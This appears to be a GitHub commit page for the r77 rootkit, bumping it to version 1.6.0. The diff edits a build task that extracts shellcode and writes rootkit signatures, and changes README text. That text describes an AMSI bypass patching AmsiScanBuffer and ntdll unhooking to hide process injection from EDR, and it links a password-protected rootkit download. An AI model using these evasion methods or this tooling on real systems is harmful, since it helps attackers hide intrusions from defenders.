Skip to content

Commit 732aeec

Browse files
committed
1.6.0
1 parent f62732d commit 732aeec

File tree

4 files changed

+4
-6
lines changed

4 files changed

+4
-6
lines changed

Diff for: $Docs/Documentation.docx

-29.2 KB
Binary file not shown.

Diff for: BuildTask/BuildTask.cs

-2
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,6 @@ namespace BuildTask
1515
/// <para>-compress: Compress file</para>
1616
/// <para>-encrypt: Encrypt file</para>
1717
/// <para>-toshellcode: Extracts an executable file's .text section</para>
18-
/// <para>-r77service: Write R77_SERVICE_SIGNATURE to r77 header</para>
1918
/// <para>-r77helper: Write R77_HELPER_SIGNATURE to r77 header</para>
2019
/// <para>-shellcodeinstaller: Converts Install.exe to Install.shellcode</para>
2120
/// </summary>
@@ -39,7 +38,6 @@ public static int Main(string[] args)
3938
if (args.Contains("-compress")) file = Compress(file);
4039
if (args.Contains("-encrypt")) file = Encrypt(file);
4140
if (args.Contains("-toshellcode")) file = ExtractShellCode(file);
42-
if (args.Contains("-r77service")) file = R77Signature(file, R77Const.R77ServiceSignature);
4341
if (args.Contains("-r77helper")) file = R77Signature(file, R77Const.R77HelperSignature);
4442

4543
File.WriteAllBytes(args[0], file);

Diff for: Global/GlobalAssemblyInfo.cs

+2-2
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
using System.Reflection;
22

3-
[assembly: AssemblyVersion("1.5.5")]
4-
[assembly: AssemblyFileVersion("1.5.5")]
3+
[assembly: AssemblyVersion("1.6.0")]
4+
[assembly: AssemblyFileVersion("1.6.0")]
55
[assembly: AssemblyCopyright("© bytecode77, 2025.")]

Diff for: README.md

+2-2
Original file line numberDiff line numberDiff line change
@@ -68,7 +68,7 @@ This graph shows each stage from the execution of the installer all the way down
6868
Several AV and EDR evasion techniques are in use:
6969

7070
- **AMSI bypass:** The PowerShell inline script disables AMSI by patching `amsi.dll!AmsiScanBuffer` to always return `AMSI_RESULT_CLEAN`. Polymorphism is used to evade signature detection of the AMSI bypass.
71-
- **DLL unhooking:** Since EDR solutions monitor API calls by hooking `ntdll.dll`, these hooks need to be removed by loading a fresh copy of `ntdll.dll` from disk and restoring the original section. Otherwise, process hollowing would be detected.
71+
- **DLL unhooking:** Since EDR solutions monitor API calls by hooking `ntdll.dll`, these hooks need to be removed by loading a fresh copy of `ntdll.dll` from disk and restoring the original section. Otherwise, process injection would be detected.
7272

7373
## Test environment
7474

@@ -82,7 +82,7 @@ Please read the [technical documentation](https://docs.bytecode77.com/r77-rootki
8282

8383
## Downloads
8484

85-
[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.5.5.zip](https://downloads.bytecode77.com/r77Rootkit%201.5.5.zip)
85+
[![](https://bytecode77.com/public/fileicons/zip.png) r77 Rootkit 1.6.0.zip](https://downloads.bytecode77.com/r77Rootkit%201.6.0.zip)
8686
(**ZIP Password:** bytecode77)<br />
8787
[![](https://bytecode77.com/public/fileicons/pdf.png) Technical Documentation](https://docs.bytecode77.com/r77-rootkit/Technical%20Documentation.pdf)
8888

0 commit comments

Comments
 (0)